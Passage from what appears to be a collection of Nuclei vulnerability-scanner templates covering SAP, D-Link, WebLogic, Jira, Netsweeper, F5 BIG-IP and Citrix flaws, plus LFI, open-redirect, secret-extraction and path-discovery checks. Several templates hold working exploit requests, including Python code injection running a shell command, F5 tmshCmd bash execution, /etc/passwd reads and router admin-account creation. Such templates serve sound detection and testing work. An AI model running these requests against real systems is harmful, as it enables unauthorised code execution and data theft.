| # > `payloads/CVE-2020-6287.xml` 14 | 15 | # Ref: 16 | # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287 17 | 18 | requests: 19 | - payloads: 20 | data: "payloads/CVE-2020-6287.xml" 21 | raw: 22 | - | 23 | POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 24 | Host: {{Hostname}} 25 | Content-Type: text/xml; charset=UTF-8 26 | Connection: close 27 | 28 | sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails 29 | matchers-condition: and 30 | matchers: 31 | - type: word 32 | words: 33 | - "urn:CTCWebServiceSi" 34 | part: body 35 | - type: status 36 | status: 37 | - 200 -------------------------------------------------------------------------------- /cves/CVE-2019-19743.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19743 2 | 3 | info: 4 | author: "pikpikcu" 5 | name: "D-Link DIR-615 - Privilege Escalation" 6 | severity: none 7 | 8 | # Source: https://www.exploit-db.com/exploits/47778 9 | # Vendor Homepage: http://www.dlink.co.in 10 | # Category: Hardware (Wi-fi Router) 11 | # Hardware Link: http://www.dlink.co.in/products/?pid=678 12 | # Hardware Version: T1 13 | # Firmware Version: 20.07 14 | # http://220.246.12.221 15 | # Create an account with a name:password(nuclei:password) change the privileges from user to root(admin) 16 | 17 | requests: 18 | # Privilege Escalation Post Request 19 | - raw: 20 | - | 21 | POST /form2userconfig.cgi HTTP/1.1 22 | Host: {{Hostname}} 23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 24 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 25 | Accept-Language: en-US,en;q=0.5 26 | Accept-Encoding: gzip, deflate 27 | Content-Type: application/x-www-form-urlencoded 28 | Content-Length: 122 29 | Origin: {{Hostname}} 30 | Connection: close 31 | Referer: {{Hostname}}/userconfig.htm 32 | Upgrade-Insecure-Requests: 1 33 | 34 | username=nuclei&privilege=2&newpass=password&confpass=password&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send 35 | 36 | matchers-condition: and 37 | matchers: 38 | - type: status 39 | status: 40 | - 200 41 | -------------------------------------------------------------------------------- /vulnerabilities/weblogic-servlet-xss.yml: -------------------------------------------------------------------------------- 1 | id: Serverlet XSS # WebLogic 2 | 3 | info: 4 | author: "pikpikcu" 5 | name: "WebLogic Servlet/2.5 JSP/2.1 XSS" 6 | severity: Medium 7 | 8 | # Payloads: '"> 9 | # X-Powered-by: Servlet/2.5 JSP/2.1 10 | # Test on shodan dork: - port:7001 Weblogic 11 | # - port:7001 12 | requests: 13 | - raw: 14 | - | 15 | POST /defaultroot/LogonAction.do HTTP/1.1 16 | Host: {{Hostname}} 17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 18 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 19 | Accept-Language: en-US,en;q=0.5 20 | Accept-Encoding: gzip, deflate 21 | Content-Type: application/x-www-form-urlencoded 22 | Content-Length: 277 23 | DNT: 1 24 | Connection: close 25 | Referer: {{Hostname}}/defaultroot/login.jsp 26 | 27 | inputPwdErrorNum=0&maxErrorNum=6&domainAccount=whir&userName=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&userPassword=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&localeCode=zh_cn&isRemember=&keyDigest= 28 | 29 | matchers-condition: and 30 | matchers: 31 | - type: status 32 | status: 33 | - 200 34 | - type: word 35 | words: 36 | - | 37 | '"> 38 | -------------------------------------------------------------------------------- /cves/CVE-2019-8451.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8451 2 | 3 | info: 4 | name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource 5 | author: "TechbrunchFR" 6 | severity: medium 7 | 8 | # On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important 9 | # security issue reported in August 2019. 10 | 11 | # CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in 12 | # the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. 13 | # An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable 14 | # Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal 15 | # network resources. 16 | # https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in 17 | # https://twitter.com/benmontour/status/1177250393220239360 18 | # https://twitter.com/ojensen5115/status/1176569607357730817 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' 24 | headers: 25 | X-Atlassian-token: no-check 26 | matchers: 27 | - type: word 28 | name: ssrf-response-body 29 | words: 30 | - '

This domain is for use in illustrative examples in documents.' 31 | part: body 32 | -------------------------------------------------------------------------------- /panels/swagger-panel.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-panel 2 | 3 | info: 4 | name: Swagger API Panel 5 | author: Ice3man 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/swagger/index.html" 12 | - "{{BaseURL}}/swagger-ui.html" 13 | - "{{BaseURL}}/swagger/swagger-ui.html" 14 | - "{{BaseURL}}/api/swagger-ui.html" 15 | - "{{BaseURL}}/api-docs/swagger.json" 16 | - "{{BaseURL}}/swagger.json" 17 | - "{{BaseURL}}/swagger/v1/swagger.json" 18 | - "{{BaseURL}}/api/index.html" 19 | - "{{BaseURL}}/api/docs/" 20 | - "{{BaseURL}}/api/swagger.json" 21 | - "{{BaseURL}}/api/swagger.yaml" 22 | - "{{BaseURL}}/api/swagger.yml" 23 | - "{{BaseURL}}/api/swagger/index.html" 24 | - "{{BaseURL}}/api/swagger/swagger-ui.html" 25 | - "{{BaseURL}}/api/api-docs/swagger.json" 26 | - "{{BaseURL}}/api/swagger-ui/swagger.json" 27 | - "{{BaseURL}}/api/apidocs/swagger.json" 28 | - "{{BaseURL}}/api/swagger-ui/api-docs" 29 | - "{{BaseURL}}/api/api-docs" 30 | - "{{BaseURL}}/api/apidocs" 31 | - "{{BaseURL}}/api/swagger" 32 | - "{{BaseURL}}/api/swagger/static/index.html" 33 | - "{{BaseURL}}/api/swagger-resources" 34 | - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" 35 | - "{{BaseURL}}/api/__swagger__/" 36 | - "{{BaseURL}}/api/_swagger_/" 37 | - "{{BaseURL}}/api/spec/swagger.json" 38 | - "{{BaseURL}}/api/swagger/ui/index" 39 | - "{{BaseURL}}/api/api/schema/" 40 | matchers: 41 | - type: word 42 | words: 43 | - "\"swagger\":" 44 | - "Swagger UI" 45 | condition: or 46 | -------------------------------------------------------------------------------- /vulnerabilities/open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: open-redirect 2 | 3 | info: 4 | name: Open Redirect Detection 5 | author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | 11 | path: 12 | - "{{BaseURL}}/evil.com/" 13 | - "{{BaseURL}}///;@evil.com" 14 | - "{{BaseURL}}/////evil.com" 15 | - "{{BaseURL}}//evil.com/%2F.." 16 | - "{{BaseURL}}//evil.com/..;/css" 17 | - "{{BaseURL}}/evil%E3%80%82com" 18 | - "{{BaseURL}}/%5Cevil.com" 19 | - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com" 20 | matchers: 21 | - type: regex 22 | regex: 23 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' 24 | part: header 25 | -------------------------------------------------------------------------------- /basic-detections/general-tokens.yaml: -------------------------------------------------------------------------------- 1 | id: general-tokens 2 | 3 | info: 4 | name: General Tokens 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}' 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 18 | - regex("API[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 19 | - regex("KEY[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 20 | - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 21 | - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 22 | - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 23 | extractors: 24 | - type: regex 25 | part: body 26 | regex: 27 | - (T|t)(O|o)(K|k)(E|e)(N|n)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)+()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 28 | - (A|a)(P|p)(Ii)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)( )*(\''|")?[0-9A-Za-z\-_]+(\''|")? 29 | - (K|k)(E|e)(Y|y)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)( )*(\''|")?[0-9A-Za-z\-_]+(\''|")? 30 | - (S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 31 | - (A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 32 | - (P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 33 | -------------------------------------------------------------------------------- /cves/CVE-2020-13167.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13167 2 | 3 | info: 4 | name: Netsweeper WebAdmin unixlogin.php Python Code Injection 5 | author: dwisiswant0 6 | severity: critical 7 | 8 | # This template exploits a Python code injection in the Netsweeper 9 | # WebAdmin component's unixlogin.php script, for versions 6.4.4 and 10 | # prior, to execute code as the root user. 11 | 12 | # Authentication is bypassed by sending a random whitelisted Referer 13 | # header in each request. 14 | 15 | # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. 16 | # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has 17 | # been confirmed exploitable. 18 | 19 | # References: 20 | # - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ 21 | # - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says 22 | 23 | requests: 24 | - method: GET 25 | path: 26 | # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out 27 | - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" 28 | - "{{BaseURL}}/webadmin/out" 29 | headers: 30 | Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php" 31 | User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)" 32 | Connection: "close" 33 | matchers-condition: and 34 | matchers: 35 | - type: word 36 | words: 37 | - "nonexistent" 38 | part: body 39 | - type: status 40 | status: 41 | - 200 -------------------------------------------------------------------------------- /files/zip-backup-files.yaml: -------------------------------------------------------------------------------- 1 | id: zip-backup-files 2 | 3 | info: 4 | name: Compressed Web folder 5 | author: Toufik Airane - https://github.com/@toufik.airane 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/{{Hostname}}.7z" 12 | - "{{BaseURL}}/{{Hostname}}.bz2" 13 | - "{{BaseURL}}/{{Hostname}}.gz" 14 | - "{{BaseURL}}/{{Hostname}}.lz" 15 | - "{{BaseURL}}/{{Hostname}}.rar" 16 | - "{{BaseURL}}/{{Hostname}}.tar.gz" 17 | - "{{BaseURL}}/{{Hostname}}.xz" 18 | - "{{BaseURL}}/{{Hostname}}.zip" 19 | - "{{BaseURL}}/{{Hostname}}.z" 20 | - "{{BaseURL}}/{{Hostname}}.tar.z" 21 | - "{{BaseURL}}/{{Hostname}}.db" 22 | - "{{BaseURL}}/{{Hostname}}.sqlite" 23 | - "{{BaseURL}}/{{Hostname}}.sqlitedb" 24 | - "{{BaseURL}}/{{Hostname}}.sql.7z" 25 | - "{{BaseURL}}/{{Hostname}}.sql.bz2" 26 | - "{{BaseURL}}/{{Hostname}}.sql.gz" 27 | - "{{BaseURL}}/{{Hostname}}.sql.lz" 28 | - "{{BaseURL}}/{{Hostname}}.sql.rar" 29 | - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" 30 | - "{{BaseURL}}/{{Hostname}}.sql.xz" 31 | - "{{BaseURL}}/{{Hostname}}.sql.zip" 32 | - "{{BaseURL}}/{{Hostname}}.sql.z" 33 | - "{{BaseURL}}/{{Hostname}}.sql.tar.z" 34 | matchers-condition: and 35 | matchers: 36 | - type: binary 37 | binary: 38 | - "377ABCAF271C" # 7z 39 | - "314159265359" # bz2 40 | - "53514c69746520666f726d6174203300" # SQLite format 3. 41 | - "1f8b" # gz tar.gz 42 | - "526172211A0700" # rar RAR archive version 1.50 43 | - "526172211A070100" # rar RAR archive version 5.0 44 | - "FD377A585A0000" # xz tar.xz 45 | - "1F9D" # z tar.z 46 | - "1FA0" # z tar.z 47 | - "4C5A4950" # lz 48 | - "504B0304" # zip 49 | condition: or 50 | part: body 51 | - type: status 52 | status: 53 | - 200 54 | -------------------------------------------------------------------------------- /technologies/ntlm-directories.yaml: -------------------------------------------------------------------------------- 1 | id: ntlm-directories 2 | 3 | info: 4 | name: Discovering directories w/ NTLM 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/abs/" 12 | - "{{BaseURL}}/adfs/services/trust/2005/windowstransport" 13 | - "{{BaseURL}}/aspnet_client/" 14 | - "{{BaseURL}}/autodiscover/" 15 | - "{{BaseURL}}/autoupdate/" 16 | - "{{BaseURL}}/certenroll/" 17 | - "{{BaseURL}}/certprov/" 18 | - "{{BaseURL}}/certsrv/" 19 | - "{{BaseURL}}/conf/" 20 | - "{{BaseURL}}/deviceupdatefiles_ext/" 21 | - "{{BaseURL}}/deviceupdatefiles_int/" 22 | - "{{BaseURL}}/dialin/" 23 | - "{{BaseURL}}/ecp/" 24 | - "{{BaseURL}}/etc/" 25 | - "{{BaseURL}}/ews/" 26 | - "{{BaseURL}}/exchange/" 27 | - "{{BaseURL}}/exchweb/" 28 | - "{{BaseURL}}/groupexpansion/" 29 | - "{{BaseURL}}/hybridconfig/" 30 | - "{{BaseURL}}/mcx/" 31 | - "{{BaseURL}}/mcx/mcxservice.svc" 32 | - "{{BaseURL}}/meet/" 33 | - "{{BaseURL}}/meeting/" 34 | - "{{BaseURL}}/microsoft-server-activesync/" 35 | - "{{BaseURL}}/oab/" 36 | - "{{BaseURL}}/ocsp/" 37 | - "{{BaseURL}}/owa/" 38 | - "{{BaseURL}}/persistentchat/" 39 | - "{{BaseURL}}/phoneconferencing/" 40 | - "{{BaseURL}}/powershell/" 41 | - "{{BaseURL}}/public/" 42 | - "{{BaseURL}}/reach/sip.svc" 43 | - "{{BaseURL}}/requesthandler/" 44 | - "{{BaseURL}}/requesthandlerext/" 45 | - "{{BaseURL}}/rgs/" 46 | - "{{BaseURL}}/rgsclients/" 47 | - "{{BaseURL}}/rpc/" 48 | - "{{BaseURL}}/rpcwithcert/" 49 | - "{{BaseURL}}/scheduler/" 50 | - "{{BaseURL}}/ucwa/" 51 | - "{{BaseURL}}/unifiedmessaging/" 52 | - "{{BaseURL}}/webticket/" 53 | - "{{BaseURL}}/webticket/webticketservice.svc" 54 | - "{{BaseURL}}/webticket/webticketservice.svcabs/" 55 | matchers: 56 | - type: word 57 | words: 58 | - "Www-Authenticate" 59 | part: header 60 | -------------------------------------------------------------------------------- /technologies/linkerd-ssrf-detect.yaml: -------------------------------------------------------------------------------- 1 | id: linkerd-ssrf-detect 2 | 3 | # Detect the Linkerd service by overriding the delegation table and 4 | # inspect the response for: 5 | # - a "Via: .. linkerd .." 6 | # - a "l5d-err" and/or a "l5d-success" header 7 | # - a verbose timeout error (binding timeout) 8 | # - a full response 9 | # The full-response case indicates a possible SSRF condition, the others 10 | # only indicates the service presence. 11 | # 12 | # If a full-response is returned you should really manually probe requests with 13 | # the following header values: 14 | # 15 | # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts 16 | # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata 17 | 18 | info: 19 | name: Linkerd SSRF detection 20 | author: dudez 21 | severity: info 22 | 23 | requests: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}/" 27 | headers: 28 | l5d-dtab: /svc/* => /$/inet/example.com/443 29 | 30 | matchers-condition: or 31 | matchers: 32 | - type: regex 33 | name: via-linkerd-present 34 | regex: 35 | - '(?mi)^Via\s*?:.*?linkerd.*$' 36 | part: header 37 | 38 | - type: regex 39 | name: l5d-err-present 40 | regex: 41 | - '(?mi)^l5d-err:.*$' 42 | part: header 43 | 44 | - type: regex 45 | name: l5d-success-class-present 46 | regex: 47 | - '(?mi)^l5d-success-class: 0.*$' 48 | part: header 49 | 50 | - type: word 51 | name: ssrf-response-body 52 | words: 53 | - '

This domain is for use in illustrative examples in documents.' 54 | part: body 55 | 56 | - type: regex 57 | name: resolve-timeout-error-present 58 | regex: 59 | - '(?mi)Exceeded .*? binding timeout while resolving name' 60 | part: body 61 | 62 | - type: regex 63 | name: dynbind-error-present 64 | regex: 65 | - '(?mi)exceeded .*? to unspecified while dyn binding' 66 | part: body 67 | -------------------------------------------------------------------------------- /cves/CVE-2020-5902.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5902 2 | 3 | info: 4 | name: F5 BIG-IP TMUI RCE 5 | author: madrobot & dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" 12 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" 13 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0:" 22 | - "BIG-IP release ([\\d.]+)" 23 | - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" 24 | condition: or 25 | part: body 26 | - raw: 27 | - | 28 | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 29 | Host: {{Hostname}} 30 | Connection: close 31 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 32 | 33 | command=create%20cli%20alias%20private%20list%20command%20bash 34 | - | 35 | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 36 | Host: {{Hostname}} 37 | Connection: close 38 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 39 | 40 | fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d 41 | - | 42 | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 43 | Host: {{Hostname}} 44 | Connection: close 45 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 46 | 47 | command=list%20%2Ftmp%2Fnonexistent 48 | - | 49 | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 50 | Host: {{Hostname}} 51 | Connection: close 52 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 53 | 54 | command=delete%20cli%20alias%20private%20list 55 | matchers-condition: and 56 | matchers: 57 | - type: status 58 | status: 59 | - 200 60 | - type: word 61 | words: 62 | - "h3ll0_w0Rld" -------------------------------------------------------------------------------- /cves/CVE-2020-8193.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-8193 2 | 3 | info: 4 | name: Citrix unauthenticated LFI 5 | author: pdteam 6 | severity: high 7 | 8 | # Source:- https://github.com/jas502n/CVE-2020-8193 9 | 10 | requests: 11 | - raw: 12 | - | 13 | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 16 | Content-Type: application/xml 17 | X-NITRO-USER: xpyZxwy6 18 | X-NITRO-PASS: xWXHUJ56 19 | 20 | 21 | 22 | - | 23 | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 24 | Host: {{Hostname}} 25 | User-Agent: python-requests/2.24.0 26 | Accept: */* 27 | Connection: close 28 | 29 | - | 30 | GET /menu/neo HTTP/1.1 31 | Host: {{Hostname}} 32 | User-Agent: python-requests/2.24.0 33 | Accept: */* 34 | Connection: close 35 | 36 | - | 37 | GET /menu/stc HTTP/1.1 38 | Host: {{Hostname}} 39 | User-Agent: python-requests/2.24.0 40 | Accept: */* 41 | Connection: close 42 | 43 | - | 44 | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 45 | Host: {{Hostname}} 46 | User-Agent: python-requests/2.24.0 47 | Accept: */* 48 | Connection: close 49 | Content-Type: application/xml 50 | X-NITRO-USER: oY39DXzQ 51 | X-NITRO-PASS: ZuU9Y9c1 52 | rand_key: randkey 53 | 54 | 55 | 56 | - | 57 | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 58 | Host: {{Hostname}} 59 | User-Agent: python-requests/2.24.0 60 | Accept: */* 61 | Connection: close 62 | Content-Type: application/xml 63 | X-NITRO-USER: oY39DXzQ 64 | X-NITRO-PASS: ZuU9Y9c1 65 | rand_key: randkey 66 | 67 | 68 | 69 | cookie-reuse: true 70 | 71 | # Using cookie-reuse to maintain session between each request, same as browser. 72 | 73 | extractors: 74 | - type: regex 75 | name: randkey 76 | part: body 77 | internal: true 78 | regex: 79 | - "(?m)[0-9]{3,10}\\.[0-9]+" 80 | 81 | # Using rand_key as dynamic variable to make use of extractors at run time. 82 | 83 | 84 | matchers: 85 | - type: regex 86 | regex: 87 | - "root:[x*]:0:0:" 88 | part: body -------------------------------------------------------------------------------- /vulnerabilities/local-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | id: LFI 2 | 3 | info: 4 | name: Local File Inclusion 5 | author: pikpikcu 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/etc/passwd' 12 | - '{{BaseURL}}/etc/shadowd' 13 | - '{{BaseURL}}/etc/passwd' 14 | - '{{BaseURL}}/etc/passwdd' 15 | - '{{BaseURL}}../etc/passwd' 16 | - '{{BaseURL}}../etc/passwdd' 17 | - '{{BaseURL}}../../etc/passwd' 18 | - '{{BaseURL}}../../etc/passwdd' 19 | - '{{BaseURL}}../../../etc/passwd' 20 | - '{{BaseURL}}../../../etc/passwdd' 21 | - '{{BaseURL}}../../../../etc/passwd' 22 | - '{{BaseURL}}../../../../etc/passwdd' 23 | - '{{BaseURL}}../../../../../etc/passwd' 24 | - '{{BaseURL}}../../../../../etc/passwdd' 25 | - '{{BaseURL}}../../../../../../etc/passwd' 26 | - '{{BaseURL}}../../../../../../etc/passwdd' 27 | - '{{BaseURL}}../../../../../../../etc/passwd' 28 | - '{{BaseURL}}../../../../../../../etc/passwdd' 29 | - '{{BaseURL}}../../../../../../../../etc/passwd' 30 | - '{{BaseURL}}../../../../../../../../etc/passwdd' 31 | - '{{BaseURL}}../../../../../../../../../etc/passwd' 32 | - '{{BaseURL}}../../../../../../../../../etc/passwdd' 33 | - '{{BaseURL}}../../../../../../../../../../etc/passwd' 34 | - '{{BaseURL}}../../../../../../../../../../etc/passwdd' 35 | - '{{BaseURL}}../../../../../../../../../../../etc/passwd' 36 | - '{{BaseURL}}../../../../../../../../../../../etc/passwdd' 37 | - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' 38 | - '{{BaseURL}}../../../../../../../../../../../../etc/passwdd' 39 | - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' 40 | - '{{BaseURL}}../../../../../../../../../../../../../etc/passwdd' 41 | - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' 42 | - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwdd' 43 | - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' 44 | - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwdd' 45 | - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' 46 | - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwdd' 47 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' 48 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwdd' 49 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' 50 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwdd' 51 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' 52 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwdd' 53 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' 54 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwdd' 55 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' 56 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwdd' 57 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' 58 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwdd' 59 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadowd' 60 | 61 | matchers: 62 | - type: regex 63 | regex: 64 | - "root:[x*]:0:0:" 65 | - "root:" 66 | part: body 67 | -------------------------------------------------------------------------------- /security-misconfiguration/springboot-detect.yaml: -------------------------------------------------------------------------------- 1 | id: springboot-actuators 2 | 3 | info: 4 | name: Detect the exposure of Springboot Actuators 5 | author: that_juan_ & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/actuator" 12 | - "{{BaseURL}}/actuator/auditevents" 13 | - "{{BaseURL}}/actuator/auditLog" 14 | - "{{BaseURL}}/actuator/beans" 15 | - "{{BaseURL}}/actuator/caches" 16 | - "{{BaseURL}}/actuator/conditions" 17 | - "{{BaseURL}}/actuator/configprops" 18 | - "{{BaseURL}}/actuator/configurationMetadata" 19 | - "{{BaseURL}}/actuator/dump" 20 | - "{{BaseURL}}/actuator/env" 21 | - "{{BaseURL}}/actuator/events" 22 | - "{{BaseURL}}/actuator/exportRegisteredServices" 23 | - "{{BaseURL}}/actuator/features" 24 | - "{{BaseURL}}/actuator/flyway" 25 | - "{{BaseURL}}/actuator/health" 26 | - "{{BaseURL}}/actuator/healthcheck" 27 | - "{{BaseURL}}/actuator/heapdump" 28 | - "{{BaseURL}}/actuator/httptrace" 29 | - "{{BaseURL}}/actuator/hystrix.stream" 30 | - "{{BaseURL}}/actuator/info" 31 | - 